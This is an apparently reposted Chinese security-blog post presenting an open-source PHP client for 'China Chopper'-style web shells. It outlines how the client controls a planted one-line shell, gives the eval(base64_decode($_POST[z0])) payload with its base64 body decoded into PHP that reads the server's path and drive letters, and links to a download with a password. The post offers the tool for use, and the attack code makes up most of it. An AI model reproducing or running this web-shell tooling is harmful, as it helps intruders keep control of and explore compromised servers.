php版web菜刀(开源)

admin 2021年9月1日18:39:48评论182 views字数 1111阅读3分42秒阅读模式

php版菜刀思路

1.判断一句话地址返回的http特征码是否是200/500

2.通过post传值执行函数

3.获取一句话文件的当前绝对路劲

4.获取当前服务器的盘符

5.遍历当前一句话文件目录下的目录与文件

6.获取当前一句话文件目录下的目录与文件的权限,创建时间,文件大小

***************************************************************

代码思路

=@eval(base64_decode($_POST[z0]));&z0=QGluaV9zZXQoImRpc3BsYXlfZXJyb3JzIiwiMCIpO0BzZXRfdGltZV9saW1pdCgwKTtAc2V0X21hZ2ljX3F1b3Rlc19ydW50aW1lKDApO2VjaG8oIi0%2BfCIpOzskRD1kaXJuYW1lKCRfU0VSVkVSWyJTQ1JJUFRfRklMRU5BTUUiXSk7ZWNobyAkRC4iXHQiO2lmKHN1YnN0cigkRCwwLDEpIT0iLyIpe2ZvcmVhY2gocmFuZ2UoIkEiLCJaIikgYXMgJEwpaWYoaXNfZGlyKCRMLiI6IikpZWNobygkTC4iOiIpO307ZWNobygifDwtIik7ZGllKCk7

 

@ini_set("display_errors","0");

 

@set_time_limit(0);

 

@set_magic_quotes_runtime(0);

 

echo("-+|");;

 

$D=dirname($_SERVER["SCRIPT_FILENAME"]);

 

echo $D."t";

 

if(substr($D,0,1)!="/"){

 

foreach(range("A","Z") as $L)

 

if(is_dir($L.":"))

 

echo($L.":");

 

};

 

echo("|<-");

 

die();

 

echo $D=dirname($_SERVER["SCRIPT_FILENAME"]);  //获取绝对路劲

 

foreach(range("A","Z") as $L) if(is_dir($L.":")) echo($L.":");//获取盘符

下载链接:<a href="http://pan.baidu.com/s/1pL6bfJX" target="_blank">http://pan.baidu.com/s/1pL6bfJX</a>   密码: bfx3

 

功能可能不是很全面。代码提供给大家作为参考谢谢。


本文始发于微信公众号(飓风网络安全):php版web菜刀(开源)

  • 左青龙
  • 微信扫一扫
  • weinxin
  • 右白虎
  • 微信扫一扫
  • weinxin
admin
  • 本文由 发表于 2021年9月1日18:39:48
  • 转载请保留本文链接(CN-SEC中文网:感谢原作者辛苦付出):
                   php版web菜刀(开源)https://cn-sec.com/archives/359377.html

发表评论

匿名网友 填写信息